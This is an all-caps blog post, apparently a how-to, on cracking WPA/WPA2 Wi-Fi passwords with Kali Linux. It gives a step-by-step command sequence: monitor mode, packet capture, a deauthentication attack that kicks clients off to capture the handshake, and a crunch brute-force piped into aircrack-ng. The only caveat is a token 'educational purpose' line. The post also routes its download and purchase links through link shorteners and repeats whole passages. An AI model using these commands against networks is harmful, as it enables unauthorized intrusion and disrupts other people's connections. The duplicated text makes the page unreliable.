HELLO FRIENDS TODAY I WILL SHOW YOU HOW TO HACK WPA/WPA2 Wi-Fi USING KALI LINUX. KALI LINUX IS A LINUX DISTRIBUTION MAINLY FOR PENITRATION TESTING AND HACKING . TO KNOW MORE ABOUT KALI LINUX VISIT
http://linkshrink.net/75gLNN
THIS POST IS FOR EDUCATIONAL PURPOSE ONLY.
FOR THIS YOU WILL NEED FEW THINGS
1)>>> A WIRELESS ADAPTER CAPABLE FOR INJECTION, I WILL RECOMMAND YOU TO USE AN EXTERNAL ONE
http://linkshrink.net/75gLNN
THIS POST IS FOR EDUCATIONAL PURPOSE ONLY.
FOR THIS YOU WILL NEED FEW THINGS
1)>>> A WIRELESS ADAPTER CAPABLE FOR INJECTION, I WILL RECOMMAND YOU TO USE AN EXTERNAL ONE
TP-Link TL-WN722N 150Mbps Wireless USB Adapter .
YOU CAN BUY ONE on http://linkshrink.net/7vuunA
AS IT IS ONE OF THE BEST ADAPTER FOR WIFI HACKING .
2)>>>AND KALI LINUX INSTALLED ON YOUR PC OR ON VERTUAL BOX OR YOU CAN USE LIVE CD.
YOU CAN DOWNLOAD KALI LINUX ISO FILE FROM http://linkshrink.net/7KTzWZ
NOW LET GET STARTED.....
STEP1)>>> OPEN TERMINAL IN KALI LINUX AND ENTER THE FOLOWING COMMANDS
>>> airmon-ng
>>>airmon-ng start wlan0 (HERE wlan0 IS THE MY NETWORK INTERFACE NAME)
>>>airodump-ng wlan0mon ( HERE wlan0mon IS THE INTERFACE AFTER MONITOR MODE)
STEP2)>>> NOW LET IT CAN ALL THE NETWORKS AVAILABLE AND PRESS CTRL+ C AND ENTER THE FOLLOWING COMMAND.
>>> airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
STEP3)>>> NOW OPEN NEW TERMINAL AND ENTER THE FOLLOWING COMMAND.
>>> aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0 ( BY ENTERING THIS CMD HANDSHAKE TAKE PLACE)
NOTE---- IN THIS METHOD NETWORK SHOULD HAVE A CLIENT .
STEP4)>>> NOW ENTER THE FOLLOWINF COMMAND TO CRACK PASSWORD.
>>> crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890 | aircrack-ng -b [bssid] -w - /root/Desktop/filename.cap
HERE FIRST 8 IS FOR THE MINIMUM LENGHT OF THE PASSWORD AND SECOND 8 FOR MAXIMUM.
NOW IT WILL TAKE TIME ACCORDING TO YOUR PASSWORD AND PC SPECS.
THANK YOU.
>>> airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
STEP3)>>> NOW OPEN NEW TERMINAL AND ENTER THE FOLLOWING COMMAND.
>>> aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0 ( BY ENTERING THIS CMD HANDSHAKE TAKE PLACE)
NOTE---- IN THIS METHOD NETWORK SHOULD HAVE A CLIENT .
STEP4)>>> NOW ENTER THE FOLLOWINF COMMAND TO CRACK PASSWORD.
>>> crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890 | aircrack-ng -b [bssid] -w - /root/Desktop/filename.cap
HERE FIRST 8 IS FOR THE MINIMUM LENGHT OF THE PASSWORD AND SECOND 8 FOR MAXIMUM.
NOW IT WILL TAKE TIME ACCORDING TO YOUR PASSWORD AND PC SPECS.
THANK YOU.
No comments:
Post a Comment